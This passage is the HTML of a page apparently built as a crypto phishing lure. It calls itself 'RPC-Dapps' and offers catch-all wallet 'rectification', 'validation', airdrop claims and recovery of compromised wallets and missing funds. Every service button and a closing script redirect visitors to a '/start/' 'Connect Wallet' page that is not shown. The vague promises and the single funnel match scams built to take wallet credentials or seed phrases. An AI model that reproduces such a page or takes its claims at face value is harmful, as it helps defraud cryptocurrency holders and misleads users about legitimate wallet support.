  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2) format('woff2');
  unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
}
/* vietnamese */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
</style>
</head>
<body>

<span id="warning-container"><i data-reactroot=""></i></span>
  
  <!-- Hero -->
   <div class="hero-section">
    <div class="container">
  
        <!-- Navbar -->
        <nav class="navbar navbar-expand-lg navbar-dark pt-3">
        <div class="container-fluid px-0">
          <h2 class="navbar-brand" href="#">
            RPC<span style="color: #bc3fea">-Dapps</span>
          </h2>
          <button class="navbar-toggler btn hero-btn" onclick="window.location='/start/'">
          Connect Wallet
        </button>

        <div class="collapse navbar-collapse" id="navbarSupportedContent">
          <ul class="navbar-nav ms-auto">
            <li class="nav-item">
              <a class="nav-link active-link" href="#">Home</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="/start/">Connect Wallet</a>
            </li>
          </ul>
        </div>
      </div>
    </nav>
  </div>
  <div class="container d-flex flex-column-reverse flex-md-row">
    <div class="hero-col1 d-flex flex-column justify-content-center">
      <h2>Node Functions</h2>
      <p class="desc heading-L">
        TOKEN SWAP &amp; CLAIM TOKEN BRIDGE • LIQUIDITY POOL AND FARM • DEPOSITS
        AND WITHDRAWALS • TOKENS STAKE AND UNSTAKE • LEDGER AND TREZOR
        HARDWARE • DEX WEBSITE ERROR • KYC &amp; WHITELIST &amp; ALLOCATION •
        AIRDROPS • COMPROMISED WALLET RECLAIM • MISSING TOKENS • UNABLE TO
        ACCESS WALLET • NFT'S AND NFT'S RELATED ISSUES • GENERAL WALLET
        ISSUES
      </p>
      <a href="#services" class="btn d-inline-block hero-btn me-3 py-2 align-self-start">Start Here</a>
    </div>
    <div class="hero-col2">
      <img class="hero-img mt-5" src="img/DDN.png" alt="Blockchain Rectification">
    </div>
  </div>
</div>

  <div id="coinmarketcap-widget-marquee" coins="1,1027,825,1321,30171,5176,32521,13855,21296,28403,3890,20362,29779" currency="USD" theme="DARK" transparent="false" show-symbol-logo="true">
</div>
  
  <!-- Services -->
  <section class="services" id="services">
  <div class="container">
    <h2 class="services-heading pb-5">Services</h2>
    <p class="services-desc pb-5" style="display: none">
      RPC-Dapps is a decentralized protocol. dConnect create an
      innovative open-source software ecosystem that is both secure and
      resilient. And it allows developers to create new online tools, many
      of which have the interest of global business markets. Validation of
      wallet will be completed below as follows
    </p>
    <div class="services-container">
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-wrench"></i>
            <h3>RECTIFICATION</h3>
            <p>Rectification support warranties completely decentralized</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start"> Select</a>
          </div>
          </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-cc-mastercard"></i>
            <h3>CLAIM REWARDS</h3>
            <p>
              Claim all initial due rewards as promised on the promotional
              terms
            </p>
            <a href="javascript:void(0)"
            class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-gear"></i>
            <h3>VALIDATION</h3>
            <p>Validation completely decentralized supports wallet</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-chain"></i>
            <h3>RECOVERY</h3>
            <p>Recovery wallet TATs Dapps with Blockchain and DeFi</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start" >Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-asl-interpreting"></i>
            <h3>SWAP TOKEN</h3>
            <p>Swap tokens of any type to tokens of any type</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-transgender-alt"></i>
            <h3>HARVEST MY STAKINGS</h3>
            <p>
              When you choose to redeem, we’ll return your assets to your
              Spot Wallet the following day.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-handshake-o"></i>
            <h3>CLAIM</h3>
            <p>
              Claim all initial due tokens as promised on the promotional
              terms
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-mars-double"></i>
            <h3>CLAIM AIRDROP</h3>
            <p>
              Claim all airdrop tokens as promised on the promotional
              terms
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-balance-scale"></i>
            <h3>CLAIM PRESALE</h3>
            <p>
              Claim all initial due tokens as promised on the promotional
              terms
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-diamond"></i>
            <h3>MINING</h3>
            <p>
              Mine tokens periodically by completing tasks.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-download"></i>
            <h3>TRANSFER OPTION</h3>
            <p>
              Transfer tokens or coins to friends anywhere around the world.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-bank"></i>
            <h3>WITHDRAWAL</h3>
            <p>
              A crypto withdrawal is a transaction that allows you to move
              your cryptocurrency balance off the Revolut platform to an
              external crypto wallet that you control such as a Ledger or a
              Trezor.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-plug"></i>
            <h3>STAKE</h3>
            <p>
              A staking pool allows multiple stakeholders (or bagholders) to
              combine their computational resources as a way to increase
              their chances of being rewarded.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-unlock"></i>
            <h3>UNSTAKE</h3>
            <p>
              Unstake your staked pools and harvest your rewards with your staked tokens.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>      
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-rocket"></i>
            <h3>MIGRATION</h3>
            <p>Migrate tokens to a new contract</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-assistive-listening-systems"></i>
            <h3>ADD TOKENS</h3>
            <p>
              Crypto tokens are a type of cryptocurrency that represents an
              asset or specific use and reside on their own blockchain.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-space-shuttle"></i>
            <h3>UPDATE MY PORTFOLIOS</h3>
            <p>
              Generate Real-Time Profit and Loss Reports, Your Coin Values,
              Reports for Taxes and More.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-cart-arrow-down"></i>
            <h3>PURCHASE TOKEN</h3>
            <p>
              Also, buy bitcoin, ether, and many common cryptocurrencies.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-snowflake-o"></i>
            <h3>MY NFTS</h3>
            <p>view your collection of digital works</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-dashboard"></i>
            <h3>STAKING REVIEW</h3>
            <p>
              Interaction between mobile apps and mobile browsers are
              supported via mobile deep linking Having complete control of
              your staking
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-chain-broken"></i>
            <h3>Missing / Irregular Balance</h3>
            <p>Recover lost/missing funds</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-cubes"></i>
            <h3>WHITELIST</h3>
            <p>Get an Early Spot for Minting.</p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
      <div class="service-card link-container">
        <a href="javascript:void(0)" class="open">
          <div class="service-card-details">
            <i class="fa fa-sitemap"></i>
            <h3>BRIDGE</h3>
            <p>
              enables applications built on different blockchains to
              communicate with and interact with each other. On launch,
              Ethereum, BSC, Avalanche, and Polygon – four of the leading
              blockchains and protocols – are supported, with capabilities
              to add new blockchains built-in to the Alliance Bridge
              protocol.
            </p>
            <a href="javascript:void(0)" class="open btn d-inline-block srv-btn me-3 py-1 align-self-start">Select</a>
          </div>
        </a>
      </div>
    </div>
  </div>
</section>

  <!-- Footer -->
  <footer>
    <div class="container text-center" style="color:#fff;margin:50px auto;">
      <p>Ready to resolve your blockchain issues?</p>
      <p>We are here to provide help.</p>
      <a href="#services" class="btn hero-btn">Start Here</a>
    </div>
  </footer>
<script>
  document.querySelectorAll('.open').forEach((el) => el.addEventListener('click', () =>  window.location.href = 'start/'))

</script>
  <!-- Bootstrap JS -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
</body>
</html>
